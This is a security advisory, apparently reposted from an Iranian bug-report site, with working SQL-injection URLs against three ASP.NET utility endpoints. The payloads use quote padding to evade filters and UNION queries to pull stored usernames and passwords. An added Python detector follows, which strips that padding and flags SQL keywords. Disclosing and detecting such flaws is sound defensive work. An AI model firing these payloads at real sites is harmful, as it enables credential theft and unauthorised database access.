# Original Advisory: http://bugreport.ir/index.php?/42

1. Exploits:
    Note 1: Use Internet Explorer (IE) for best results.
    Note 2: The "'" characters are used to bypass any SQL injection filter.
    
    1.1. SQL injection in the "xslIdn" parameter of "/utils/getXsl.aspx".
            -------------
            http://[URL]/utils/getXsl.aspx?xslIdn=-1' union' all' select 'UsrNam%2bUsrPwd' from' [Usr]
            Open the downloaded file with Notepad.
            -------------
    1.2. SQL injection in the "part" parameter of "/utils/getXml.aspx".
            -------------
            http://[URL]/utils/getXml.aspx?lnkIdn=-1&part=1 from' 'lnk' 'where' 1='2187 'union' all' 'select' 'UsrNam%2bUsrPwd' from' [Usr]' 'union' all' select' data1' 
            Open the downloaded file with Notepad.
            -------------
    1.3. SQL injection in the "part" parameter of "/utils/getXls.aspx".
            -------------
            /utils/getXls.aspx?lnkIdn=-1&part=1 'from 'lnk' 'where' 1='2187 'union' all' 'select' 'CHAR(60)%2bCHAR(116)%2bCHAR(97)%2bCHAR(98)%2bCHAR(108)%2bCHAR(101)%2bCHAR(62)%2bCHAR(60)%2bCHAR(116)%2bCHAR(114)%2bCHAR(62)%2b CHAR(60)%2bCHAR(116)%2bCHAR(100)%2bCHAR(62)%2bUsrNam%2bUsrPwd%2bCHAR(60)%2bCHAR(47)%2bCHAR(116)%2bCHAR(100)%2bCHAR(62)%2b CHAR(60)%2bCHAR(47)%2bCHAR(116)%2bCHAR(114)%2bCHAR(62)%2bCHAR(60)%2bCHAR(47)%2bCHAR(116)%2bCHAR(97)%2bCHAR(98)%2bCHAR(108)%2bCHAR(101)%2bCHAR(62) 'from '[Usr] 'union 'all 'select' data1'
            Open the downloaded file with Notepad.
            -------------
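
Detection logic for the request patterns above, as an added example that is not part of the original advisory: it removes the quote padding described in Note 2 before matching SQL keywords in the three affected parameters. The function names, the sample request targets and the assumption that these parameters hold integers in normal use are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Endpoints and parameters named in the advisory (lower-cased for matching).
WATCHED = {
    "/utils/getxsl.aspx": ("xslidn",),
    "/utils/getxml.aspx": ("lnkidn", "part"),
    "/utils/getxls.aspx": ("lnkidn", "part"),
}
SQL_TOKENS = re.compile(
    r"\bunion\s+(?:all\s+)?select\b|\bselect\b.+\bfrom\b", re.I | re.S)

def normalize(raw):
    """URL-decode a value, then replace quote padding with single spaces."""
    decoded = unquote_plus(raw)
    return re.sub(r"[\s'\"]+", " ", decoded).strip()

def inspect(target):
    """Return (parameter, reason) findings for one request target."""
    path, _, query = target.partition("?")
    params = WATCHED.get(path.lower())
    if params is None:
        return []
    findings = []
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        if name.lower() not in params:
            continue
        clean = normalize(raw)
        if SQL_TOKENS.search(clean):
            findings.append((name, "sql-keywords-after-quote-stripping"))
        elif not re.fullmatch(r"-?\d+", clean):
            # Assumption: these parameters are integer ids in normal use.
            findings.append((name, "non-integer-value"))
    return findings

# Constructed request targets (not taken from real logs).
SAMPLES = [
    "/utils/getXsl.aspx?xslIdn=12",
    "/utils/getXml.aspx?lnkIdn=3&part=1",
    "/utils/getXsl.aspx?xslIdn=-1'%20union'%20all'%20select%20'a'%20from'%20[t]",
    "/utils/getXls.aspx?lnkIdn=-1&part=abc",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(inspect(sample), sample)
```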